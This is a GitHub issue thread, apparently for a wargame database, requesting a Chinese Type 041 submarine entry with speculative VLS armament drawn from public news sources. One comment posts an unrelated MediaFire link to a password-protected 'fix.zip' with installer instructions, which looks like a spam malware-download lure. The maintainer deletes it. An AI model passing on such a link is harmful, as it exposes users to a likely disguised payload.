### ISSUE TITLE
China, PLAN, Type 041 SSK/SSB

### ISSUE THREAD

**Issue by Luigi-II** [PygmalionOfCyprus/cmo-db-requests#4967] opened 2024-08-26 15:28 UTC
### DB Selector

DB3K

### DBID to Copy

Submarine 695

### Hypothetical

No

### Name

Type 041 [Type 039C Mod?]

### Country

China

### Service

PLAN

### In Commission

2025

### Number in Service

8x in 1st Batch?

### Mounts

Add **2x "China VLS [4 cell] - 4x YJ-21 (Record 11470)" (total 8 cells)** as its mount. We observed an extension of at least 8 meters compared to Type 039a/b/c, so this space can accommodate at least two module of Quad-VLS on the Type 032 submarine.

### Other Changes

It seems that most analysts believe that this is a KSS-III like SSK/SSB. Although, I still suspect that it might be the mysterious SSK-N. Well, I have no evidence for that.

### Sources

https://twitter.com/tshugart3/status/1817535868640391258
https://www.navalnews.com/naval-news/2024/08/china-launches-its-most-sophisticated-submarine-to-date/#prettyPhoto

> The increased hull length may indicate the addition of a vertical launch system (VLS) for missiles. This is an increasingly important consideration in submarines but is less common in non-nuclear submarines which are generally smaller. The trend in non-nuclear submarines has been set by the South Korean KSS-III and Israeli Drakon Class. If this new submarine does have a VLS behind the sail it can likely accommodate between four and eight missiles, depending on their diameter.

![image](https://github.com/user-attachments/assets/2037bde7-4e0b-4a65-a9ca-3a9eaece9c31)

https://www.twz.com/sea/chinas-latest-submarine-features-x-shaped-stern

> At this stage, we can’t be certain that the lengthened hull of the new Chinese design accommodates VLS cells, but it’s certainly an intriguing possibility. VLS cells could be used to launch additional cruise missiles, for extra overall capacity, while also freeing up the torpedo tubes for their primary weapons. New types of missiles might also be better accommodated by VLS cells, perhaps even including hypersonic weapons that would likely be too large for the torpedo tubes, or potentially smaller types of ballistic missiles, as in the South Korean Dosan Ahn Changho class.  **China is already a pioneer in ship-launched ballistic missiles and it’s conceivable that such weapons could also find their way onto submarines.**

**Comment by xiaobai-marker** [comment] 2024-08-26 15:30
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Luigi-II** [comment] 2024-08-26 15:35
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Hey, who or what is this guy?

**Comment by PygmalionOfCyprus** [comment] 2024-08-26 16:09
Deleted.

**Comment by Luigi-II** [comment] 2024-09-03 05:09
https://twitter.com/AlexLuck9/status/1819211532460494979/photo/2
![image](https://github.com/user-attachments/assets/fb767360-c982-4013-bcfd-1f561f327beb)
One VLS cell is large enough to hold more than two adult males shoulder width, so this VLS unit can apparently hold a 0.85m diameter (presumably) YJ-21.

**Comment by PygmalionOfCyprus** [comment] 2024-09-26 17:02
Duplicate of #4457

**Closed as not planned by PygmalionOfCyprus** 2024-09-26 17:02 UTC
Labels: DB3K, submarine, copy
